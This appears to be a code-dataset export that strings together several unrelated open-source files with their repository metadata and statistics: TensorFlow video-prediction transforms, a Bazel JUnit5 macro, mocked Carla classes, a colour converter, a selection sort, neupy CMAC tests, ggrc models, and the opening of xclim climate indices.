width = int(prev_image.get_shape()[2])
# Predict kernels using linear function of last hidden layer.
cdna_kerns = slim.layers.fully_connected(
cdna_input,
DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks,
scope='cdna_params',
activation_fn=None)
# Reshape and normalize.
cdna_kerns = tf.reshape(
cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks])
cdna_kerns = tf.nn.relu(cdna_kerns - RELU_SHIFT) + RELU_SHIFT
norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True)
cdna_kerns /= norm_factor
# Treat the color channel dimension as the batch dimension since the same
# transformation is applied to each color channel.
# Treat the batch dimension as the channel dimension so that
# depthwise_conv2d can apply a different transformation to each sample.
cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3])
cdna_kerns = tf.reshape(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])
# Swap the batch and channel dimensions.
prev_image = tf.transpose(prev_image, [3, 1, 2, 0])
# Transform image.
transformed = tf.nn.depthwise_conv2d(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')
# Transpose the dimensions to where they belong.
transformed = tf.reshape(transformed, [color_channels, height, width, batch_size, num_masks])
transformed = tf.transpose(transformed, [3, 1, 2, 0, 4])
transformed = tf.unstack(transformed, axis=-1)
return transformed
def dna_transformation(prev_image, dna_input):
"""Apply dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
dna_input: hidden lyaer to be used for computing DNA transformation.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
# Construct translated images.
prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])
image_height = int(prev_image.get_shape()[1])
image_width = int(prev_image.get_shape()[2])
inputs = []
for xkern in range(DNA_KERN_SIZE):
for ykern in range(DNA_KERN_SIZE):
inputs.append(
tf.expand_dims(
tf.slice(prev_image_pad, [0, xkern, ykern, 0],
[-1, image_height, image_width, -1]), [3]))
inputs = tf.concat(axis=3, values=inputs)
# Normalize channels to 1.
kernel = tf.nn.relu(dna_input - RELU_SHIFT) + RELU_SHIFT
kernel = tf.expand_dims(
kernel / tf.reduce_sum(
kernel, [3], keep_dims=True), [4])
return tf.reduce_sum(kernel * inputs, [3], keep_dims=False)
def scheduled_sample(ground_truth_x, generated_x, batch_size, num_ground_truth):
"""Sample batch with specified mix of ground truth and generated data points.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
num_ground_truth: number of ground-truth examples to include in batch.
Returns:
New batch with num_ground_truth sampled from ground_truth_x and the rest
from generated_x.
"""
idx = tf.random_shuffle(tf.range(int(batch_size)))
ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth))
generated_idx = tf.gather(idx, tf.range(num_ground_truth, int(batch_size)))
ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx)
generated_examps = tf.gather(generated_x, generated_idx)
return tf.dynamic_stitch([ground_truth_idx, generated_idx],
[ground_truth_examps, generated_examps])
| 37.903766
| 95
| 0.669886
| 2,488
| 18,118
| 4.691318
| 0.181672
| 0.023561
| 0.016707
| 0.021847
| 0.239291
| 0.18977
| 0.160212
| 0.134339
| 0.083105
| 0.070082
| 0
| 0.028182
| 0.230323
| 18,118
| 477
| 96
| 37.983229
| 0.80882
| 0.312341
| 0
| 0.131086
| 0
| 0
| 0.040223
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026217
| false
| 0
| 0.026217
| 0
| 0.082397
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137575ac656962b0f9d67245530a471421c965ac
| 1,657
|
bzl
|
Python
|
junit5/rules.bzl
|
prashantsharma04/bazel_java_rules
|
4f80fbe70e1778aa8e3e0ee8aa2f1efc3e44a462
|
[
"Apache-2.0"
] | 1
|
2020-10-22T06:44:10.000Z
|
2020-10-22T06:44:10.000Z
|
junit5/rules.bzl
|
prashantsharma04/bazel_java_rules
|
4f80fbe70e1778aa8e3e0ee8aa2f1efc3e44a462
|
[
"Apache-2.0"
] | 5
|
2020-06-01T22:33:59.000Z
|
2020-11-01T17:03:06.000Z
|
junit5/rules.bzl
|
prashantsharma04/bazel_java_rules
|
4f80fbe70e1778aa8e3e0ee8aa2f1efc3e44a462
|
[
"Apache-2.0"
] | 1
|
2020-08-17T07:42:21.000Z
|
2020-08-17T07:42:21.000Z
|
load("@rules_jvm_external//:defs.bzl", "artifact")
# For more information see
# - https://github.com/bmuschko/bazel-examples/blob/master/java/junit5-test/BUILD
# - https://github.com/salesforce/bazel-maven-proxy/tree/master/tools/junit5
# - https://github.com/junit-team/junit5-samples/tree/master/junit5-jupiter-starter-bazel
def junit5_test(name, srcs, test_package, resources = [], deps = [], runtime_deps = [], **kwargs):
"""JUnit runner macro"""
FILTER_KWARGS = [
"main_class",
"use_testrunner",
"args",
]
for arg in FILTER_KWARGS:
if arg in kwargs.keys():
kwargs.pop(arg)
junit_console_args = []
if test_package:
junit_console_args += ["--select-package", test_package]
else:
fail("must specify 'test_package'")
native.java_test(
name = name,
srcs = srcs,
use_testrunner = False,
main_class = "org.junit.platform.console.ConsoleLauncher",
args = junit_console_args,
deps = deps + [
artifact("org.junit.jupiter:junit-jupiter-api"),
artifact("org.junit.jupiter:junit-jupiter-params"),
artifact("org.junit.jupiter:junit-jupiter-engine"),
artifact("org.hamcrest:hamcrest-library"),
artifact("org.hamcrest:hamcrest-core"),
artifact("org.hamcrest:hamcrest"),
artifact("org.mockito:mockito-core"),
],
visibility = ["//java:__subpackages__"],
resources = resources,
runtime_deps = runtime_deps + [
artifact("org.junit.platform:junit-platform-console"),
],
**kwargs
)
| 35.255319
| 98
| 0.616174
| 181
| 1,657
| 5.491713
| 0.40884
| 0.088531
| 0.064386
| 0.069417
| 0.105634
| 0.105634
| 0
| 0
| 0
| 0
| 0
| 0.003971
| 0.240193
| 1,657
| 46
| 99
| 36.021739
| 0.785544
| 0.173205
| 0
| 0.054054
| 0
| 0
| 0.31227
| 0.254225
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0
| 0
| 0.027027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1376113ee039ab051c772dba764cfe52a310f45d
| 625
|
py
|
Python
|
tests/mocked_carla.py
|
fangedward/pylot
|
a742b3789ee8e7fa2d692ae22bda1e2960ed9345
|
[
"Apache-2.0"
] | null | null | null |
tests/mocked_carla.py
|
fangedward/pylot
|
a742b3789ee8e7fa2d692ae22bda1e2960ed9345
|
[
"Apache-2.0"
] | null | null | null |
tests/mocked_carla.py
|
fangedward/pylot
|
a742b3789ee8e7fa2d692ae22bda1e2960ed9345
|
[
"Apache-2.0"
] | null | null | null |
# This module provides mocked versions of classes and functions provided
# by Carla in our runtime environment.
class Location(object):
""" A mock class for carla.Location. """
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
class Rotation(object):
""" A mock class for carla.Rotation. """
def __init__(self, pitch, yaw, roll):
self.pitch = pitch
self.yaw = yaw
self.roll = roll
class Vector3D(object):
""" A mock class for carla.Vector3D. """
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
| 20.833333
| 72
| 0.5776
| 88
| 625
| 3.965909
| 0.375
| 0.057307
| 0.094556
| 0.137536
| 0.389685
| 0.389685
| 0.183381
| 0.183381
| 0.183381
| 0.183381
| 0
| 0.004619
| 0.3072
| 625
| 29
| 73
| 21.551724
| 0.801386
| 0.336
| 0
| 0.533333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1377e6c9502e17891e25610fab3c369d6bcdf674
| 404
|
py
|
Python
|
rgb_to_cmyk.py
|
Zweizack/fuzzy-rainbow
|
f69f7eb59971d28a9093a03c1911b41e23cddf2a
|
[
"MIT"
] | null | null | null |
rgb_to_cmyk.py
|
Zweizack/fuzzy-rainbow
|
f69f7eb59971d28a9093a03c1911b41e23cddf2a
|
[
"MIT"
] | null | null | null |
rgb_to_cmyk.py
|
Zweizack/fuzzy-rainbow
|
f69f7eb59971d28a9093a03c1911b41e23cddf2a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
ee = '\033[1m'
green = '\033[32m'
yellow = '\033[33m'
cyan = '\033[36m'
line = cyan+'-' * 0x2D
print(ee+line)
R,G,B = [float(X) / 0xFF for X in input(f'{yellow}RGB: {green}').split()]
K = 1-max(R,G,B)
C,M,Y = [round(float((1-X-K)/(1-K) * 0x64),1) for X in [R,G,B]]
K = round(K * 0x64,1)
print(f'{yellow}CMYK: {green}{C}%, {M}%, {Y}%, {K}%')
print(line)
| 21.263158
| 73
| 0.542079
| 80
| 404
| 2.7375
| 0.5
| 0.027397
| 0.041096
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102339
| 0.153465
| 404
| 18
| 74
| 22.444444
| 0.538012
| 0.106436
| 0
| 0
| 0
| 0
| 0.264624
| 0
| 0
| 0
| 0.044568
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13783bd8e2a248d44492c03b9013e0d6c16cfd22
| 478
|
py
|
Python
|
sort/selectionsort.py
|
vitormrts/sorting-algorithms
|
5571ce522a7fd33f976fa05b264ed2c253c221b3
|
[
"MIT"
] | null | null | null |
sort/selectionsort.py
|
vitormrts/sorting-algorithms
|
5571ce522a7fd33f976fa05b264ed2c253c221b3
|
[
"MIT"
] | null | null | null |
sort/selectionsort.py
|
vitormrts/sorting-algorithms
|
5571ce522a7fd33f976fa05b264ed2c253c221b3
|
[
"MIT"
] | null | null | null |
def selection_sort(A): # O(n^2)
n = len(A)
for i in range(n-1): # percorre a lista
min = i
for j in range(i+1, n): # encontra o menor elemento da lista a partir de i + 1
if A[j] < A[min]:
min = j
A[i], A[min] = A[min], A[i] # insere o elemento na posicao correta
return A
# 1 + (n-1)*[3 + X] = 1 + 3*(n-1) + X*(n-1) = 1 + 3*(n-1) + (n^2 + n - 2)/2
# = (1 - 3 - 1) + (3n + n/2) + (n^2/2)
# The complexity is O(n^2)
| 36.769231
| 86
| 0.464435
| 98
| 478
| 2.255102
| 0.357143
| 0.054299
| 0.040724
| 0.036199
| 0.045249
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078864
| 0.33682
| 478
| 13
| 87
| 36.769231
| 0.618297
| 0.520921
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1379b64de3a90f72d35d03219b56d72544b5e73a
| 2,806
|
py
|
Python
|
tests/algorithms/memory/test_cmac.py
|
FrostByte266/neupy
|
4b7127e5e4178b0cce023ba36542f5ad3f1d798c
|
[
"MIT"
] | 801
|
2015-09-23T09:24:47.000Z
|
2022-03-29T19:19:03.000Z
|
tests/algorithms/memory/test_cmac.py
|
FrostByte266/neupy
|
4b7127e5e4178b0cce023ba36542f5ad3f1d798c
|
[
"MIT"
] | 277
|
2015-09-22T19:48:50.000Z
|
2022-03-11T23:25:32.000Z
|
tests/algorithms/memory/test_cmac.py
|
FrostByte266/neupy
|
4b7127e5e4178b0cce023ba36542f5ad3f1d798c
|
[
"MIT"
] | 194
|
2015-09-23T15:03:57.000Z
|
2022-03-31T13:54:46.000Z
|
import numpy as np
from sklearn import metrics
from neupy import algorithms
from base import BaseTestCase
class CMACTestCase(BaseTestCase):
def test_cmac(self):
X_train = np.reshape(np.linspace(0, 2 * np.pi, 100), (100, 1))
X_train_before = X_train.copy()
X_test = np.reshape(np.linspace(np.pi, 2 * np.pi, 50), (50, 1))
y_train = np.sin(X_train)
y_train_before = y_train.copy()
y_test = np.sin(X_test)
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
verbose=False,
)
cmac.train(X_train, y_train, epochs=100)
predicted_test = cmac.predict(X_test)
predicted_test = predicted_test.reshape((len(predicted_test), 1))
error = metrics.mean_absolute_error(y_test, predicted_test)
self.assertAlmostEqual(error, 0.0024, places=4)
# Test that algorithm didn't modify data samples
np.testing.assert_array_equal(X_train, X_train_before)
np.testing.assert_array_equal(X_train, X_train_before)
np.testing.assert_array_equal(y_train, y_train_before)
self.assertPickledNetwork(cmac, X_train)
def test_train_different_inputs(self):
self.assertInvalidVectorTrain(
network=algorithms.CMAC(),
input_vector=np.array([1, 2, 3]),
target=np.array([1, 2, 3])
)
def test_predict_different_inputs(self):
cmac = algorithms.CMAC()
data = np.array([[1, 2, 3]]).T
target = np.array([[1, 2, 3]]).T
cmac.train(data, target, epochs=100)
self.assertInvalidVectorPred(
network=cmac,
input_vector=np.array([1, 2, 3]),
target=target,
decimal=2
)
def test_cmac_multi_output(self):
X_train = np.linspace(0, 2 * np.pi, 100)
X_train = np.vstack([X_train, X_train])
X_test = np.linspace(0, 2 * np.pi, 100)
X_test = np.vstack([X_test, X_test])
y_train = np.sin(X_train)
y_test = np.sin(X_test)
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
)
cmac.train(X_train, y_train,
X_test, y_test, epochs=100)
predicted_test = cmac.predict(X_test)
error = metrics.mean_absolute_error(y_test, predicted_test)
self.assertAlmostEqual(error, 0, places=6)
def test_cmac_training_exceptions(self):
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
)
with self.assertRaises(ValueError):
cmac.train(X_train=True, y_train=True,
X_test=None, y_test=True)
| 30.172043
| 73
| 0.599786
| 371
| 2,806
| 4.304582
| 0.22372
| 0.06387
| 0.041327
| 0.028178
| 0.489042
| 0.489042
| 0.438948
| 0.405135
| 0.332498
| 0.293676
| 0
| 0.040323
| 0.292944
| 2,806
| 92
| 74
| 30.5
| 0.764617
| 0.016393
| 0
| 0.342857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128571
| 1
| 0.071429
| false
| 0
| 0.057143
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137a3688b49f0ea26253687c4f9e076efa9114c9
| 3,075
|
py
|
Python
|
src/ggrc_workflows/models/task_group_object.py
|
Smotko/ggrc-core
|
b3abb58b24e7559960d71a94ba79c75539e7fe29
|
[
"Apache-2.0"
] | null | null | null |
src/ggrc_workflows/models/task_group_object.py
|
Smotko/ggrc-core
|
b3abb58b24e7559960d71a94ba79c75539e7fe29
|
[
"Apache-2.0"
] | 12
|
2015-01-08T14:50:19.000Z
|
2017-11-29T19:37:53.000Z
|
src/ggrc_workflows/models/task_group_object.py
|
Smotko/ggrc-core
|
b3abb58b24e7559960d71a94ba79c75539e7fe29
|
[
"Apache-2.0"
] | 1
|
2015-01-08T13:25:09.000Z
|
2015-01-08T13:25:09.000Z
|
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: dan@reciprocitylabs.com
from sqlalchemy.ext.associationproxy import association_proxy
from ggrc import db
from ggrc.models.mixins import Mapping
from ggrc.models.mixins import Timeboxed
from ggrc.models.reflection import PublishOnly
class TaskGroupObject(Timeboxed, Mapping, db.Model):
__tablename__ = 'task_group_objects'
task_group_id = db.Column(
db.Integer, db.ForeignKey('task_groups.id'), nullable=False)
object_id = db.Column(db.Integer, nullable=False)
object_type = db.Column(db.String, nullable=False)
@property
def object_attr(self):
return '{0}_object'.format(self.object_type)
@property
def object(self):
return getattr(self, self.object_attr)
@object.setter
def object(self, value):
self.object_id = value.id if value is not None else None
self.object_type = value.__class__.__name__ if value is not None \
else None
return setattr(self, self.object_attr, value)
@staticmethod
def _extra_table_args(cls):
return (
db.UniqueConstraint('task_group_id', 'object_id', 'object_type'),
db.Index('ix_task_group_id', 'task_group_id'),
)
_publish_attrs = [
'task_group',
'object',
]
_sanitize_html = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupObject, cls).eager_query()
return query.options(
orm.subqueryload('task_group'))
def _display_name(self):
return self.object.display_name + '<->' + self.task_group.display_name
def copy(self, _other=None, **kwargs):
columns = [
'task_group', 'object_id', 'object_type'
]
target = self.copy_into(_other, columns, **kwargs)
return target
class TaskGroupable(object):
@classmethod
def late_init_task_groupable(cls):
def make_task_group_objects(cls):
cls.task_groups = association_proxy(
'task_group_objects', 'task_group',
creator=lambda task_group: TaskGroupObject(
task_group=task_group,
object_type=cls.__name__,
)
)
joinstr = 'and_(foreign(TaskGroupObject.object_id) == {type}.id, '\
'foreign(TaskGroupObject.object_type) == "{type}")'
joinstr = joinstr.format(type=cls.__name__)
return db.relationship(
'TaskGroupObject',
primaryjoin=joinstr,
backref='{0}_object'.format(cls.__name__),
cascade='all, delete-orphan',
)
cls.task_group_objects = make_task_group_objects(cls)
_publish_attrs = [
PublishOnly('task_groups'),
'task_group_objects',
]
_include_links = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupable, cls).eager_query()
return cls.eager_inclusions(query, TaskGroupable._include_links).options(
orm.subqueryload('task_group_objects'))
| 29.285714
| 78
| 0.690407
| 375
| 3,075
| 5.373333
| 0.317333
| 0.084864
| 0.055583
| 0.022829
| 0.206452
| 0.083375
| 0.083375
| 0.059553
| 0.059553
| 0.059553
| 0
| 0.003251
| 0.199675
| 3,075
| 104
| 79
| 29.567308
| 0.815522
| 0.074146
| 0
| 0.1375
| 0
| 0
| 0.135116
| 0.02639
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.0875
| 0.05
| 0.45
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137dda311b44a103b066cfeaf00c02a9bb814cbf
| 19,777
|
py
|
Python
|
xclim/indices/_anuclim.py
|
bzah/xclim
|
18ceee3f1db2d39355913c1c60ec32ddca6baccc
|
[
"Apache-2.0"
] | 1
|
2022-02-03T13:46:58.000Z
|
2022-02-03T13:46:58.000Z
|
xclim/indices/_anuclim.py
|
raquel-ucl/xclim
|
6102e542e6e08072a60879d6200f9340207cd50e
|
[
"Apache-2.0"
] | 2
|
2021-06-23T09:26:54.000Z
|
2021-07-26T19:28:41.000Z
|
xclim/indices/_anuclim.py
|
raquel-ucl/xclim
|
6102e542e6e08072a60879d6200f9340207cd50e
|
[
"Apache-2.0"
] | 1
|
2021-03-02T20:12:28.000Z
|
2021-03-02T20:12:28.000Z
|
# noqa: D100
from typing import Optional
import numpy as np
import xarray
from xclim.core.units import (
convert_units_to,
declare_units,
pint_multiply,
rate2amount,
units,
units2pint,
)
from xclim.core.utils import ensure_chunk_size
from ._multivariate import (
daily_temperature_range,
extreme_temperature_range,
precip_accumulation,
)
from ._simple import tg_mean
from .generic import select_resample_op
from .run_length import lazy_indexing
# Frequencies : YS: year start, QS-DEC: seasons starting in december, MS: month start
# See http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases
# -------------------------------------------------- #
# ATTENTION: ASSUME ALL INDICES WRONG UNTIL TESTED ! #
# -------------------------------------------------- #
__all__ = [
"temperature_seasonality",
"precip_seasonality",
"tg_mean_warmcold_quarter",
"tg_mean_wetdry_quarter",
"prcptot_wetdry_quarter",
"prcptot_warmcold_quarter",
"prcptot",
"prcptot_wetdry_period",
"isothermality",
]
_xr_argops = {
"wettest": xarray.DataArray.argmax,
"warmest": xarray.DataArray.argmax,
"dryest": xarray.DataArray.argmin,
"driest": xarray.DataArray.argmin,
"coldest": xarray.DataArray.argmin,
}
_np_ops = {
"wettest": "max",
"warmest": "max",
"dryest": "min",
"driest": "min",
"coldest": "min",
}
@declare_units(tasmin="[temperature]", tasmax="[temperature]")
def isothermality(
tasmin: xarray.DataArray, tasmax: xarray.DataArray, freq: str = "YS"
) -> xarray.DataArray:
r"""Isothermality.
The mean diurnal range divided by the annual temperature range.
Parameters
----------
tasmin : xarray.DataArray
Average daily minimum temperature at daily, weekly, or monthly frequency.
tasmax : xarray.DataArray
Average daily maximum temperature at daily, weekly, or monthly frequency.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [%]
Isothermality
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the output with input data with daily frequency as well. As such weekly or monthly input values, if desired, should
be calculated prior to calling the function.
"""
dtr = daily_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
etr = extreme_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
with xarray.set_options(keep_attrs=True):
iso = dtr / etr * 100
iso.attrs["units"] = "%"
return iso
@declare_units(tas="[temperature]")
def temperature_seasonality(tas: xarray.DataArray) -> xarray.DataArray:
r"""ANUCLIM temperature seasonality (coefficient of variation).
The annual temperature coefficient of variation expressed in percent. Calculated as the standard deviation
of temperature values for a given year expressed as a percentage of the mean of those temperatures.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
Returns
-------
xarray.DataArray, [%]
Mean temperature coefficient of variation
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature seasonality:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file).tas
>>> tday_seasonality = xci.temperature_seasonality(t)
>>> t_weekly = xci.tg_mean(t, freq='7D')
>>> tweek_seasonality = xci.temperature_seasonality(t_weekly)
Notes
-----
For this calculation, the mean in degrees Kelvin is used. This avoids the possibility of having to
divide by zero, but it does mean that the values are usually quite small.
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be
calculated prior to calling the function.
"""
tas = convert_units_to(tas, "K")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(tas)
seas.attrs["units"] = "%"
return seas
@declare_units(pr="[precipitation]")
def precip_seasonality(
pr: xarray.DataArray,
) -> xarray.DataArray:
r"""ANUCLIM Precipitation Seasonality (C of V).
The annual precipitation Coefficient of Variation (C of V) expressed in percent. Calculated as the standard deviation
of precipitation values for a given year expressed as a percentage of the mean of those values.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
Units need to be defined as a rate (e.g. mm d-1, mm week-1).
Returns
-------
xarray.DataArray, [%]
Precipitation coefficient of variation
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual precipitation seasonality:
>>> import xclim.indices as xci
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> pday_seasonality = xci.precip_seasonality(p)
>>> p_weekly = xci.precip_accumulation(p, freq='7D')
# Input units need to be a rate
>>> p_weekly.attrs['units'] = "mm/week"
>>> pweek_seasonality = xci.precip_seasonality(p_weekly)
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
If input units are in mm s-1 (or equivalent) values are converted to mm/day to avoid potentially small denominator
values.
"""
# If units in mm/sec convert to mm/days to avoid potentially small denominator
if units2pint(pr) == units("mm / s"):
pr = convert_units_to(pr, "mm d-1")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(pr)
seas.attrs["units"] = "%"
return seas
@declare_units(tas="[temperature]")
def tg_mean_warmcold_quarter(
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the mean temperature of this period is
calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods,
otherwise as 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : str {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate warmest quarter; 'coldest' calculate coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quearter of each year.
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature
warmest quarter mean temperature:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file)
>>> t_warm_qrt = xci.tg_mean_warmcold_quarter(tas=t.tas, op='warmest', src_timestep='daily')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
out = _to_quarter(src_timestep, tas=tas)
oper = _np_ops[op]
out = select_resample_op(out, oper, freq)
out.attrs["units"] = tas.units
return out
@declare_units(tas="[temperature]", pr="[precipitation]")
def tg_mean_wetdry_quarter(
tas: xarray.DataArray,
pr: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the mean temperature of this period is calculated.
If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods, otherwise are 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform: 'wettest' calculate for the wettest quarter; 'driest' calculate for the driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quarter of each year.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
tas_qrt = _to_quarter(src_timestep, tas=tas)
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
with xarray.set_options(keep_attrs=True):
out = _from_other_arg(criteria=pr_qrt, output=tas_qrt, op=xr_op, freq=freq)
out.attrs = tas.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot_wetdry_quarter(
pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the total precipitation of this
period is calculated. If the input data frequency is daily ("D") or weekly ("W") quarters
are defined as 13 week periods, otherwise are 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform : 'wettest' calculate wettest quarter ; 'driest' calculate driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation values of the {op} quarter of each year.
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual wettest quarter total precipitation:
>>> from xclim.indices import prcptot_wetdry_quarter
>>> p = xr.open_dataset(path_to_pr_file)
>>> pr_warm_qrt = prcptot_wetdry_quarter(pr=p.pr, op='wettest', src_timestep='D')
Notes
-----
